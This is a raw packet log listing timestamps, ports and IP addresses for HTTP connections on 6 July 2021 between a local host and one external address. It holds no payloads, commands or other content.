Jul 6, 2021 14:31:11.551618099 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.551640034 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.588752031 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588784933 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588805914 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588834047 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588859081 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588880062 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588901997 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588915110 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.588923931 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588938951 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.588946104 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588968992 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588973999 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.588989973 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.588999033 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589016914 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589036942 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589041948 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589062929 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589068890 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589085102 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589097977 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589107037 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589127064 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589131117 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589148998 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589170933 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589174032 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589195967 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589198112 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589221001 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589227915 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589237928 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589258909 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589260101 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589282036 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589293003 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589308023 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589325905 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589332104 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589353085 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589354992 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589375019 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589392900 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589396000 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589418888 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589421034 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589440107 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589449883 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589461088 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589473009 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589488983 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589512110 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589513063 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589534998 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589534998 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589556932 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589560032 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589579105 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589579105 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589600086 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589605093 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589622021 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589622974 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589643002 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589649916 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589667082 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589669943 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589685917 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589693069 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589704037 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589714050 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589725971 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589756966 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589776993 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589797974 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589840889 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.589926958 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.589989901 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590015888 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590039968 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590050936 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590060949 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590061903 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590082884 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590096951 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590104103 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590116024 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590125084 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590133905 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590146065 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590159893 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590172052 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590194941 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590195894 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590217113 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590228081 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590240002 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590249062 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590261936 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590270996 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590286970 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590298891 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590301991 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590316057 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590332031 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590347052 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590363979 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590390921 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590416908 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590450048 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590471983 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590498924 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590522051 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590523958 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590543032 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590549946 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590564966 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590584993 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590585947 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590605021 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590606928 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590629101 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590646029 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590650082 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590675116 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590677023 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590699911 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590708017 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590722084 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590739965 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590743065 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590764999 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590773106 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:11.590784073 CEST	80	49886	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:11.590831041 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:12.949971914 CEST	49886	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:12.950098991 CEST	49885	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:12.970949888 CEST	49887	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:12.972182989 CEST	49884	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:14.385150909 CEST	49888	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:14.394085884 CEST	49889	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:14.423208952 CEST	80	49888	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:14.424787998 CEST	49888	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:14.432224989 CEST	80	49889	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:14.432832003 CEST	49889	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:14.488343000 CEST	49888	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:14.525286913 CEST	80	49888	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:14.547493935 CEST	80	49888	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:14.547513008 CEST	80	49888	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:14.547521114 CEST	80	49888	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:14.547661066 CEST	49888	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:16.520649910 CEST	49888	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:16.520881891 CEST	49889	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.084018946 CEST	49892	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.084225893 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.123529911 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.123553038 CEST	80	49892	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.123820066 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.125627995 CEST	49892	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.136749029 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.173733950 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193449974 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193547010 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193562984 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.193569899 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193591118 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193618059 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193639040 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193656921 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193675995 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193692923 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193730116 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.193756104 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.193873882 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.230849981 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.230890036 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.230921030 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.230931997 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.230948925 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.230967999 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.230978966 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.230995893 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231002092 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231031895 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231040955 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231061935 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231062889 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231080055 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231091976 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231103897 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231132030 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231142998 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231175900 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231187105 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231208086 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231220961 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231239080 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231256962 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231267929 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231285095 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231300116 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231311083 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231333017 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231340885 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231364965 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231376886 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231396914 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231411934 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231429100 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231436014 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231461048 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.231471062 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.231502056 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271003962 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271040916 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271068096 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271095991 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271140099 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271148920 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271167994 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271177053 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271198988 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271228075 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271229982 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271255970 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271265030 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271285057 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271302938 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271315098 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271334887 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271342993 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271368980 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271369934 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271398067 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271414995 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271425962 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271452904 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271466017 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271482944 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271511078 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271518946 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271538973 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271567106 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271567106 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271601915 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271603107 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271635056 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271648884 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271667004 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271697044 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271723032 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271733999 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271752119 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271778107 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271795034 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271807909 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271836042 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271836042 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271863937 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271867037 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271892071 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271919012 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271920919 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271949053 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.271960974 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.271976948 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.272006035 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.272008896 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.272033930 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.272061110 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.272061110 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.272089958 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.272090912 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.272119045 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.272146940 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.272147894 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.272188902 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.272233963 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.311721087 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311759949 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311789036 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311815977 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311844110 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311871052 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311898947 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311928034 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311955929 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.311984062 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312011957 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312040091 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312067986 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312096119 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312123060 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312150955 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312179089 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312206030 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312233925 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312262058 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312289953 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312318087 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312345028 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312371969 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312400103 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312427998 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312455893 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312484026 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312510967 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312539101 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312566042 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312597990 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312653065 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312680960 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312709093 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312736988 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312763929 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312791109 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312819004 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312848091 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312875986 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312902927 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312931061 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312958956 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.312987089 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313014984 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313041925 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313070059 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313097954 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313126087 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313153028 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313179970 CEST	80	49893	45.90.58.179	192.168.2.4
